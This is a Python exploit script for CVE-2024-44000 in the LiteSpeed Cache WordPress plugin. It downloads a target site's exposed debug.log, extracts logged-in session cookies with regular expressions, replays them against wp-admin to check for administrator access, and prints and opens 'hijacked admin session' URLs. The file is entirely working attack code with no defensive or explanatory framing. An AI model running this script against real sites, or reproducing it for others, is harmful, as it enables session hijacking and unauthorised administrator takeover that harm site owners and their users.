import requests
import re
import argparse
from urllib.parse import urljoin, quote
import tempfile
import webbrowser

def extract_cookies(log_file):
    cookies = []
    with open(log_file, 'r') as f:
        for line in f:
            match = re.search(r'Cookie: (.*)', line)
            if match:
                cookies.append(match.group(1))
    return cookies

def extract_session_cookies(cookies):
    session_cookies = []
    for cookie in cookies:
        match = re.search(r'wordpress_logged_in_[^=]+=[^;]+', cookie)
        if match:
            session_cookies.append(match.group(0))
    return session_cookies

def extract_and_use_cookies(url):
    session = requests.Session()
    log_url = urljoin(url, "wp-content/debug.log")
    try:
        response = session.get(log_url, allow_redirects=False, timeout=10)
        
        if response.status_code == 200:
            print("[+] Successfully accessed the debug log file")
            
            with tempfile.NamedTemporaryFile(mode='w', encoding='utf-8', delete=False) as tmp:
                tmp.write(response.text)
                log_file = tmp.name
            
            cookies = extract_cookies(log_file)
            session_cookies = extract_session_cookies(cookies)
            
            if session_cookies:
                print("[+] Found session cookies:")
                for cookie in session_cookies:
                    print(f"    {cookie}")
                
                for admin_cookie in session_cookies:
                    cookie_name, cookie_value = admin_cookie.split('=')
                    session.cookies.set(cookie_name, cookie_value)
                    admin_url = urljoin(url, "wp-admin/")
                    admin_response = session.get(admin_url, allow_redirects=False)
                    
                    if admin_response.status_code == 302 and 'wp-admin' in admin_response.headers.get('Location', ''):
                        hijacked_url = f"{urljoin(url, 'wp-login.php')}?redirect_to={quote(admin_url + f'?{cookie_name}={cookie_value}')}&reauth=1"
                        print("[+] Successfully hijacked admin session with cookie:", admin_cookie)
                        print("[+] Hijacked admin session URL:", hijacked_url)
                        
                        cookie_set_url = f"{urljoin(url, 'wp-login.php')}?cookie={cookie_name}={cookie_value}"
                        print("[+] Cookie set URL:", cookie_set_url)

                        # Open the cookie set URL in the default browser
                        webbrowser.open(cookie_set_url)

                        return True
                    else:
                        print("[-] Failed to hijack admin session with cookie:", admin_cookie)
            else:
                print("[-] No session cookies found in the log file")
        else:
            print(f"[-] Failed to access the debug log file. Status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error occurred while accessing the target: {e}")
    
    return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="LiteSpeed Cache Cookie Extractor and Admin Login (CVE-2024-44000)")
    parser.add_argument("url", help="Target WordPress site URL")
    args = parser.parse_args()

    # Attempt to extract cookies and use them to login as admin
    extract_and_use_cookies(args.url)
